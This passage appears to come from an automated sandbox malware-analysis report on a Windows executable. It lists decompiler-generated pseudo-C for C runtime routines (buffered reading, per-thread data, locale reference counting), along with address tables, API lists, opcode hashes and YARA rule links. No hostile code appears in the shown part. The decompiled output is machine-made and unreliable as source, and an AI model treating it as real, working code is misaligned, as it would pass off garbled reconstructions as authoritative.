                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                  • _malloc.LIBCMT ref: 00405842
                                                                                                                                                  • _malloc.LIBCMT ref: 00405906
                                                                                                                                                  • _malloc.LIBCMT ref: 00405930
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _malloc$AllocateHeap
                                                                                                                                                  • String ID: 1.2.3
                                                                                                                                                  • API String ID: 680241177-2310465506
                                                                                                                                                  • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                  • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                  • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                  • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                  0x0040bcc2
                                                                                                                                                  0x0040bcca
                                                                                                                                                  0x0040bcce
                                                                                                                                                  0x0040bcd3
                                                                                                                                                  0x0040bcd5
                                                                                                                                                  0x0040bcd8
                                                                                                                                                  0x0040bcde
                                                                                                                                                  0x0040bd01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce7
                                                                                                                                                  0x0040bd08
                                                                                                                                                  0x0040bd0b
                                                                                                                                                  0x0040bd0d
                                                                                                                                                  0x0040bd1c
                                                                                                                                                  0x0040bd1c
                                                                                                                                                  0x0040bd1f
                                                                                                                                                  0x0040bd24
                                                                                                                                                  0x0040bd29
                                                                                                                                                  0x0040bd29
                                                                                                                                                  0x0040bd2c
                                                                                                                                                  0x0040bd2e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd30
                                                                                                                                                  0x0040bd30
                                                                                                                                                  0x0040bd35
                                                                                                                                                  0x0040bd38
                                                                                                                                                  0x0040bd3b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd3d
                                                                                                                                                  0x0040bd40
                                                                                                                                                  0x0040bd44
                                                                                                                                                  0x0040bd4b
                                                                                                                                                  0x0040bd4e
                                                                                                                                                  0x0040bd50
                                                                                                                                                  0x0040bd5a
                                                                                                                                                  0x0040bd52
                                                                                                                                                  0x0040bd55
                                                                                                                                                  0x0040bd55
                                                                                                                                                  0x0040bd61
                                                                                                                                                  0x0040bd63
                                                                                                                                                  0x0040be53
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd70
                                                                                                                                                  0x0040bdb6
                                                                                                                                                  0x0040bdb6
                                                                                                                                                  0x0040bdb9
                                                                                                                                                  0x0040be24
                                                                                                                                                  0x0040be2a
                                                                                                                                                  0x0040be2d
                                                                                                                                                  0x0040beb8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bebe
                                                                                                                                                  0x0040be33
                                                                                                                                                  0x0040be37
                                                                                                                                                  0x0040be87
                                                                                                                                                  0x0040be87
                                                                                                                                                  0x0040be8b
                                                                                                                                                  0x0040be95
                                                                                                                                                  0x0040be9a
                                                                                                                                                  0x0040be9a
                                                                                                                                                  0x0040bea2
                                                                                                                                                  0x0040beaa
                                                                                                                                                  0x0040beab
                                                                                                                                                  0x0040beac
                                                                                                                                                  0x0040bead
                                                                                                                                                  0x0040beae
                                                                                                                                                  0x0040bcf9
                                                                                                                                                  0x0040bcf9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcfe
                                                                                                                                                  0x0040be39
                                                                                                                                                  0x0040be3c
                                                                                                                                                  0x0040be3f
                                                                                                                                                  0x0040be44
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be48
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be48
                                                                                                                                                  0x0040bdbb
                                                                                                                                                  0x0040bdbf
                                                                                                                                                  0x0040bde0
                                                                                                                                                  0x0040bde5
                                                                                                                                                  0x0040bde7
                                                                                                                                                  0x0040bde9
                                                                                                                                                  0x0040bde9
                                                                                                                                                  0x0040bdc1
                                                                                                                                                  0x0040bdc8
                                                                                                                                                  0x0040bdca
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdda
                                                                                                                                                  0x0040bdcc
                                                                                                                                                  0x0040bdce
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bddc
                                                                                                                                                  0x0040bddc
                                                                                                                                                  0x0040bdeb
                                                                                                                                                  0x0040bdee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdf4
                                                                                                                                                  0x0040bdf4
                                                                                                                                                  0x0040bdf5
                                                                                                                                                  0x0040bdf9
                                                                                                                                                  0x0040bdfe
                                                                                                                                                  0x0040bdff
                                                                                                                                                  0x0040be00
                                                                                                                                                  0x0040be05
                                                                                                                                                  0x0040be08
                                                                                                                                                  0x0040be0a
                                                                                                                                                  0x0040bec6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bec6
                                                                                                                                                  0x0040be10
                                                                                                                                                  0x0040be13
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040be19
                                                                                                                                                  0x0040be1c
                                                                                                                                                  0x0040be1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be1e
                                                                                                                                                  0x0040bdee
                                                                                                                                                  0x0040bd72
                                                                                                                                                  0x0040bd75
                                                                                                                                                  0x0040bd77
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd79
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd7f
                                                                                                                                                  0x0040bd81
                                                                                                                                                  0x0040bd83
                                                                                                                                                  0x0040bd85
                                                                                                                                                  0x0040bd85
                                                                                                                                                  0x0040bd87
                                                                                                                                                  0x0040bd8a
                                                                                                                                                  0x0040be5b
                                                                                                                                                  0x0040be5d
                                                                                                                                                  0x0040be61
                                                                                                                                                  0x0040be6a
                                                                                                                                                  0x0040be6f
                                                                                                                                                  0x0040be6f
                                                                                                                                                  0x0040be72
                                                                                                                                                  0x0040be77
                                                                                                                                                  0x0040be78
                                                                                                                                                  0x0040be79
                                                                                                                                                  0x0040be7a
                                                                                                                                                  0x0040be7b
                                                                                                                                                  0x0040be81
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd90
                                                                                                                                                  0x0040bd99
                                                                                                                                                  0x0040bd9e
                                                                                                                                                  0x0040bda1
                                                                                                                                                  0x0040bda3
                                                                                                                                                  0x0040bda6
                                                                                                                                                  0x0040bda8
                                                                                                                                                  0x0040bdab
                                                                                                                                                  0x0040bdae
                                                                                                                                                  0x0040bdae
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd63
                                                                                                                                                  0x0040bd2e
                                                                                                                                                  0x0040bd0f
                                                                                                                                                  0x0040bd14
                                                                                                                                                  0x0040bd14
                                                                                                                                                  0x0040bd17
                                                                                                                                                  0x0040bd1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd1a
                                                                                                                                                  0x0040bce9
                                                                                                                                                  0x0040bce9
                                                                                                                                                  0x0040bcee
                                                                                                                                                  0x0040bcef
                                                                                                                                                  0x0040bcf0
                                                                                                                                                  0x0040bcf1
                                                                                                                                                  0x0040bcf2
                                                                                                                                                  0x0040bcf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcf8

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3886058894-0
                                                                                                                                                  • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                  • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                  • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                  • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}







                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x0041473a
                                                                                                                                                  0x0041473f
                                                                                                                                                  0x00414749
                                                                                                                                                  0x0041474b
                                                                                                                                                  0x00414753
                                                                                                                                                  0x00414777
                                                                                                                                                  0x00414779
                                                                                                                                                  0x0041477f
                                                                                                                                                  0x00414783
                                                                                                                                                  0x00414786
                                                                                                                                                  0x00414791
                                                                                                                                                  0x00414794
                                                                                                                                                  0x0041479b
                                                                                                                                                  0x00414755
                                                                                                                                                  0x00414755
                                                                                                                                                  0x00414759
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041475b
                                                                                                                                                  0x00414760
                                                                                                                                                  0x00414760
                                                                                                                                                  0x00414759
                                                                                                                                                  0x00414765
                                                                                                                                                  0x00414769
                                                                                                                                                  0x0041476e
                                                                                                                                                  0x00414776

                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 00414744
                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                  • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                  • __lock.LIBCMT ref: 00414779
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                  • String ID: @.B
                                                                                                                                                  • API String ID: 3521780317-470711618
                                                                                                                                                  • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                  • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                  • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                  • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040C73D, Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}













                                                                                                                                                  0x0040c73d
                                                                                                                                                  0x0040c690
                                                                                                                                                  0x0040c692
                                                                                                                                                  0x0040c697
                                                                                                                                                  0x0040c69e
                                                                                                                                                  0x0040c6a3
                                                                                                                                                  0x0040c6a8
                                                                                                                                                  0x0040c6aa
                                                                                                                                                  0x0040c6c8
                                                                                                                                                  0x0040c6ce
                                                                                                                                                  0x0040c6d1
                                                                                                                                                  0x0040c6d6
                                                                                                                                                  0x0040c6dc
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c6e1
                                                                                                                                                  0x0040c6e2
                                                                                                                                                  0x0040c6e8
                                                                                                                                                  0x0040c6eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6ed
                                                                                                                                                  0x0040c6ee
                                                                                                                                                  0x0040c70b
                                                                                                                                                  0x0040c70b
                                                                                                                                                  0x0040c6eb
                                                                                                                                                  0x0040c714
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x0040c71e
                                                                                                                                                  0x0040c725
                                                                                                                                                  0x0040c72a
                                                                                                                                                  0x0040c72a
                                                                                                                                                  0x0040c6ac
                                                                                                                                                  0x0040c6ac
                                                                                                                                                  0x0040c6b3
                                                                                                                                                  0x0040c6b4
                                                                                                                                                  0x0040c6b6
                                                                                                                                                  0x0040c6b7
                                                                                                                                                  0x0040c6b8
                                                                                                                                                  0x0040c6b9
                                                                                                                                                  0x0040c6ba
                                                                                                                                                  0x0040c6bb
                                                                                                                                                  0x0040c6c3
                                                                                                                                                  0x0040c6c3
                                                                                                                                                  0x0040c731

                                                                                                                                                  APIs
                                                                                                                                                  • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2805327698-0
                                                                                                                                                  • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                  • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                  • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                  • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x4c1658
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x4c1658
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x4c1658
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}










                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fce
                                                                                                                                                  0x00413fd3
                                                                                                                                                  0x00413fdd
                                                                                                                                                  0x00413fdf
                                                                                                                                                  0x00413fe7
                                                                                                                                                  0x00414008
                                                                                                                                                  0x0041400e
                                                                                                                                                  0x00414012
                                                                                                                                                  0x00414015
                                                                                                                                                  0x00414018
                                                                                                                                                  0x0041401e
                                                                                                                                                  0x00414020
                                                                                                                                                  0x00414022
                                                                                                                                                  0x00414025
                                                                                                                                                  0x0041402b
                                                                                                                                                  0x0041402d
                                                                                                                                                  0x0041402f
                                                                                                                                                  0x00414035
                                                                                                                                                  0x00414037
                                                                                                                                                  0x00414038
                                                                                                                                                  0x0041403d
                                                                                                                                                  0x00414035
                                                                                                                                                  0x0041402d
                                                                                                                                                  0x0041403e
                                                                                                                                                  0x00414043
                                                                                                                                                  0x00414046
                                                                                                                                                  0x0041404c
                                                                                                                                                  0x00414050
                                                                                                                                                  0x00414050
                                                                                                                                                  0x00414056
                                                                                                                                                  0x0041405d
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413ff4
                                                                                                                                                  0x00413ff8
                                                                                                                                                  0x00413ffd
                                                                                                                                                  0x00414005

                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                  • __lock.LIBCMT ref: 00414008
                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                  • InterlockedIncrement.KERNEL32(004C1658), ref: 00414050
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                  • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                  • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                  • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
